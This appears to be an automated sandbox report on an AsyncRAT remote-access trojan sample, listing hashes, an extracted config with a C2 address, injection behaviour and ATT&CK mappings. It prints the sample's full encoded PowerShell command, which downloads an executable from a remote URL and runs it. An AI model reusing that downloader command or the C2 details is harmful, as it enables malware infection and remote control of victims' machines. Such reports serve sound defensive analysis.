asyncrat | d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d

General

Target

d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe
Size

5KB
MD5

85ad8c8be29f8ec83a34585e05d45d11
SHA1

670bfc831a82935e613cf2e0ce95374d3c52e5bf
SHA256

d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d
SHA512

0918dfbaea95655a81c67c729bca574b27ded41700caa99d0606965c56d473d606286fe70183072f019177b9e3492d45d55b94f5b09d11b7d7885e8c3c667bc5
SSDEEP

96:f79ill3VI2FwQtzuvk+PeAYKOsDvk+PlzcvHd3ojLrl:j9i/33KQcvkiYKZvkowHd0

Score

10^/10

asyncrat system guard runtime rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

System Guard Runtime

C2

85.105.88.221:2531

Mutex

System Guard Runtime

Attributes

delay
3
install
false
install_file
System Guard Runtime
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4252-147-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

11 4732 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

1.exe1.exe

pid process

5116 1.exe
1936 1.exe

flow	pid	process
11	4732	powershell.exe

pid	process
5116	1.exe
1936	1.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

1.exe1.exe

description pid process target process

PID 5116 set thread context of 4252 5116 1.exe RegAsm.exe
PID 1936 set thread context of 1644 1936 1.exe RegAsm.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4732 powershell.exe
4732 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exe1.exe1.exe

description pid process

Token: SeDebugPrivilege 4732 powershell.exe
Token: SeDebugPrivilege 5116 1.exe
Token: SeDebugPrivilege 1936 1.exe

description	pid	process	target process
PID 5116 set thread context of 4252	5116	1.exe	RegAsm.exe
PID 1936 set thread context of 1644	1936	1.exe	RegAsm.exe

pid	process
4732	powershell.exe
4732	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	5116	1.exe
Token: SeDebugPrivilege	1936	1.exe

Suspicious use of WriteProcessMemory 21 IoCs

Processes:

d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exepowershell.exe1.exe1.exe

description	pid	process	target process
PID 3124 wrote to memory of 4732	3124	d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe	powershell.exe
PID 3124 wrote to memory of 4732	3124	d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe	powershell.exe
PID 4732 wrote to memory of 5116	4732	powershell.exe	1.exe
PID 4732 wrote to memory of 5116	4732	powershell.exe	1.exe
PID 4732 wrote to memory of 5116	4732	powershell.exe	1.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 5116 wrote to memory of 4252	5116	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe
PID 1936 wrote to memory of 1644	1936	1.exe	RegAsm.exe

C:\Users\Admin\AppData\Local\Temp\d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe
"C:\Users\Admin\AppData\Local\Temp\d7ec34f5ac76d5d3d55f952c6bca7bef911d9f0910ac3579116c51842ac4e65d.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3124

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AagBxACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADUANwA0ADEANAA4ADQAOAA5ADAANgAwADAANgA2ADAAOQAvADEAMAA1ADcANAAxADUAMAAxADgANAA2ADkAMQA0ADYANwAyADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAHcAdgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBhAHkAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB3AHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQApADwAIwB6AGsAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBsAGgAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBrAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAuAGUAeABlACcAKQA8ACMAZQBrAGoAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732

C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5116

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4252

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1936

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2⤵
PID:1644

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\1.exe.log
Filesize
902B

MD5
317ed182314a105b8436cfd8bb3879f6

SHA1
aa407b44619a9b06b18d8a39ce27a65b959598e1

SHA256
34a156e5235a27901293bd8928b37d13724d62183e409f6d284110280c56f865

SHA512
27bc617005ef36be6384484e5cec56d7165d1e9535c9a0b5546f1f082cc4bf5969acb573da77171ac7f4119c8cf50a3ced103cd21485569c9cfcf2e340468604

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
C:\Users\Admin\AppData\Roaming\1.exe
Filesize
14.7MB

MD5
2cbd5d9d43c5c49f0580975e9e620808

SHA1
17e209b6d6c66882ed78a40d7e0d211760b489a0

SHA256
399a0e77326dc484fa92fd5f95f2dbd89866dfd4e7e80661634a9a83f0652403

SHA512
26e06d3d3b4f8d1198f483e2485ee107782c7f5b70ddb4d48dd84c9ef81029af316ad3a184c90921c6f1188f92d88b9fd6a152eaba5648a03bfbdea589202812

Download Submit
memory/1644-150-0x0000000000000000-mapping.dmp

Download
memory/3124-134-0x00007FFEB0E60000-0x00007FFEB1921000-memory.dmp

Filesize
10.8MB

Download
memory/3124-132-0x0000000000A30000-0x0000000000A38000-memory.dmp

Filesize
32KB

Download
memory/3124-141-0x00007FFEB0E60000-0x00007FFEB1921000-memory.dmp

Filesize
10.8MB

Download
memory/4252-146-0x0000000000000000-mapping.dmp

Download
memory/4252-147-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/4732-140-0x00007FFEB0E60000-0x00007FFEB1921000-memory.dmp

Filesize
10.8MB

Download
memory/4732-136-0x00007FFEB0E60000-0x00007FFEB1921000-memory.dmp

Filesize
10.8MB

Download
memory/4732-135-0x000002AFE6DC0000-0x000002AFE6DE2000-memory.dmp

Filesize
136KB

Download
memory/4732-133-0x0000000000000000-mapping.dmp

Download
memory/5116-143-0x0000000007710000-0x0000000007CB4000-memory.dmp

Filesize
5.6MB

Download
memory/5116-144-0x0000000006DF0000-0x0000000006E82000-memory.dmp

Filesize
584KB

Download
memory/5116-145-0x0000000006F40000-0x0000000006FDC000-memory.dmp

Filesize
624KB

Download
memory/5116-142-0x0000000000C70000-0x0000000001B20000-memory.dmp

Filesize
14.7MB

Download
memory/5116-137-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads